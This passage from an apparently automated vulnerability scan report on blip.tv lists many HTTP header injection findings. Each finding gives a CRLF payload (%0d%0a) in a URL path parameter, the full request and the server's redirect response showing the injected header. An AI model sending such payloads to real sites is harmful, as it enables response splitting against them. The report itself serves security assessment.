Date: Thu, 20 Jan 2011 00:39:18 GMT
X-Varnish: 2146053727
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/92757
badafac1cb4/mediaad/1
...[SNIP]...

2.34. http://blip.tv/dtd/mediaad/1.0 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dtd/mediaad/1.0

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 80dc3%0d%0afb8c85f6d6f was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /dtd/80dc3%0d%0afb8c85f6d6f/1.0 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/dtd/80dc3
fb8c85f6d6f
/1.0
Content-Type: text/html; charset=iso-8859-1
Content-Length: 286
Date: Thu, 20 Jan 2011 00:39:19 GMT
X-Varnish: 1025275279
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/dtd/80dc3
fb8c85f6d6f/1.0">
...[SNIP]...

2.35. http://blip.tv/dtd/mediaad/1.0 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dtd/mediaad/1.0

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload c6ffc%0d%0a8d9673043c6 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /dtd/mediaad/c6ffc%0d%0a8d9673043c6 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/dtd/mediaad/c6ffc
8d9673043c6

Content-Type: text/html; charset=iso-8859-1
Content-Length: 290
Date: Thu, 20 Jan 2011 00:39:19 GMT
X-Varnish: 2146053849
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/dtd/mediaad/c6ffc
8d9673043
...[SNIP]...

2.36. http://blip.tv/epk [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /epk

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload c5912%0d%0aa5e22b55bb8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /c5912%0d%0aa5e22b55bb8 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/c5912
a5e22b55bb8

Content-Type: text/html; charset=iso-8859-1
Content-Length: 278
Date: Thu, 20 Jan 2011 00:39:09 GMT
X-Varnish: 1498223475
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/c5912
a5e22b55bb8">here</a>
...[SNIP]...

2.37. http://blip.tv/faq [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /faq

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1364e%0d%0a742bb6d3cc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1364e%0d%0a742bb6d3cc HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/1364e
742bb6d3cc

Content-Type: text/html; charset=iso-8859-1
Content-Length: 277
Date: Thu, 20 Jan 2011 00:39:03 GMT
X-Varnish: 1498222509
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/1364e
742bb6d3cc">here</a>.
...[SNIP]...

2.38. http://blip.tv/file/3006747 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/3006747

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 92515%0d%0a3a5487ed0a6 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /92515%0d%0a3a5487ed0a6/3006747 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/92515
3a5487ed0a6
/3006747
Content-Type: text/html; charset=iso-8859-1
Content-Length: 286
Date: Thu, 20 Jan 2011 00:38:34 GMT
X-Varnish: 1274882698
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/92515
3a5487ed0a6/3006747">
...[SNIP]...

2.39. http://blip.tv/file/3006747 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/3006747

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 33f2f%0d%0aa80c1df9336 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/33f2f%0d%0aa80c1df9336 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/33f2f
a80c1df9336

Content-Type: text/html; charset=iso-8859-1
Content-Length: 298
Date: Thu, 20 Jan 2011 00:38:35 GMT
X-Varnish: 344228099
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/33f2f
a80c1df9336">her
...[SNIP]...

2.40. http://blip.tv/file/4341289 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4341289

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2defe%0d%0a85750fef9bf was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2defe%0d%0a85750fef9bf/4341289 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/2defe
85750fef9bf
/4341289
Content-Type: text/html; charset=iso-8859-1
Content-Length: 286
Date: Thu, 20 Jan 2011 00:38:35 GMT
X-Varnish: 1274882913
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/2defe
85750fef9bf/4341289">
...[SNIP]...

2.41. http://blip.tv/file/4341289 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4341289

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 77c44%0d%0a731e5840778 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/77c44%0d%0a731e5840778 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/77c44
731e5840778

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:36 GMT
X-Varnish: 1498218035
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/77c44
731e5840778">her
...[SNIP]...

2.42. http://blip.tv/file/4416697 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4416697

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 838ca%0d%0af3fd031237e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /838ca%0d%0af3fd031237e/4416697 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/838ca
f3fd031237e
/4416697
Content-Type: text/html; charset=iso-8859-1
Content-Length: 286
Date: Thu, 20 Jan 2011 00:38:36 GMT
X-Varnish: 1498218069
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/838ca
f3fd031237e/4416697">
...[SNIP]...

2.43. http://blip.tv/file/4416697 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4416697

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 44d2f%0d%0a2d5d0852c17 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/44d2f%0d%0a2d5d0852c17 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/44d2f
2d5d0852c17

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:36 GMT
X-Varnish: 1498218133
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/44d2f
2d5d0852c17">her
...[SNIP]...

2.44. http://blip.tv/file/4469619 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4469619

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7ba8a%0d%0a36f11fef696 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7ba8a%0d%0a36f11fef696/4469619 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/7ba8a
36f11fef696
/4469619
Content-Type: text/html; charset=iso-8859-1
Content-Length: 286
Date: Thu, 20 Jan 2011 00:38:35 GMT
X-Varnish: 2146046709
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/7ba8a
36f11fef696/4469619">
...[SNIP]...

2.45. http://blip.tv/file/4469619 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4469619

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload d9a18%0d%0a6d93c89ed7b was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/d9a18%0d%0a6d93c89ed7b HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/d9a18
6d93c89ed7b

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:36 GMT
X-Varnish: 1274882937
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/d9a18
6d93c89ed7b">her
...[SNIP]...

2.46. http://blip.tv/file/4581305 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4581305

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 33faa%0d%0afe8f417e499 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /33faa%0d%0afe8f417e499/4581305 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/33faa
fe8f417e499
/4581305
Content-Type: text/html; charset=iso-8859-1
Content-Length: 301
Date: Thu, 20 Jan 2011 00:38:34 GMT
X-Varnish: 1498217742
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/33faa
fe8f417e499/4581305">
...[SNIP]...

2.47. http://blip.tv/file/4581305 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4581305

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 7e2f5%0d%0a1833df07fdd was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/7e2f5%0d%0a1833df07fdd HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/7e2f5
1833df07fdd

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:34 GMT
X-Varnish: 1324528387
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/7e2f5
1833df07fdd">her
...[SNIP]...

2.48. http://blip.tv/file/4584742 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4584742

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload f67ac%0d%0a68d36caf2a2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /f67ac%0d%0a68d36caf2a2/4584742 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/f67ac
68d36caf2a2
/4584742
Content-Type: text/html; charset=iso-8859-1
Content-Length: 286
Date: Thu, 20 Jan 2011 00:38:33 GMT
X-Varnish: 2146046439
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/f67ac
68d36caf2a2/4584742">
...[SNIP]...

2.49. http://blip.tv/file/4584742 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4584742

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload e960c%0d%0ab5af3a4e13a was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/e960c%0d%0ab5af3a4e13a HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/e960c
b5af3a4e13a

Content-Type: text/html; charset=iso-8859-1
Content-Length: 298
Date: Thu, 20 Jan 2011 00:38:34 GMT
X-Varnish: 344227963
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/e960c
b5af3a4e13a">her
...[SNIP]...

2.50. http://blip.tv/file/4590551 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4590551

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 39bb4%0d%0a4b50fb528ed was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /39bb4%0d%0a4b50fb528ed/4590551 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/39bb4
4b50fb528ed
/4590551
Content-Type: text/html; charset=iso-8859-1
Content-Length: 286
Date: Thu, 20 Jan 2011 00:38:33 GMT
X-Varnish: 1025267706
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/39bb4
4b50fb528ed/4590551">
...[SNIP]...

2.51. http://blip.tv/file/4590551 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4590551

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload afb39%0d%0a42540f14b1e was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/afb39%0d%0a42540f14b1e HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/afb39
42540f14b1e

Content-Type: text/html; charset=iso-8859-1
Content-Length: 298
Date: Thu, 20 Jan 2011 00:38:34 GMT
X-Varnish: 1025267752
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/afb39
42540f14b1e">her
...[SNIP]...

2.52. http://blip.tv/file/4627157 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4627157

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload c015b%0d%0a5a45b6bf0c7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /c015b%0d%0a5a45b6bf0c7/4627157 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/c015b
5a45b6bf0c7
/4627157
Content-Type: text/html; charset=iso-8859-1
Content-Length: 286
Date: Thu, 20 Jan 2011 00:38:31 GMT
X-Varnish: 1025267356
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/c015b
5a45b6bf0c7/4627157">
...[SNIP]...

2.53. http://blip.tv/file/4627157 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4627157

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload eabb0%0d%0ab16f0f647e2 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/eabb0%0d%0ab16f0f647e2 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/eabb0
b16f0f647e2

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:31 GMT
X-Varnish: 1498217357
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/eabb0
b16f0f647e2">her
...[SNIP]...

2.54. http://blip.tv/file/4639878 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4639878

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 57924%0d%0a766c2b1b358 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /57924%0d%0a766c2b1b358/4639878?filename=ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/57924
766c2b1b358
/4639878?filename=ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4
Content-Type: text/html; charset=iso-8859-1
Content-Length: 364
Date: Thu, 20 Jan 2011 00:38:01 GMT
X-Varnish: 2146042173
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/57924
766c2b1b358/4639878?f
...[SNIP]...

2.55. http://blip.tv/file/4639878 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4639878

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 5186e%0d%0a79aa2929b74 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/5186e%0d%0a79aa2929b74?filename=ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/5186e
79aa2929b74
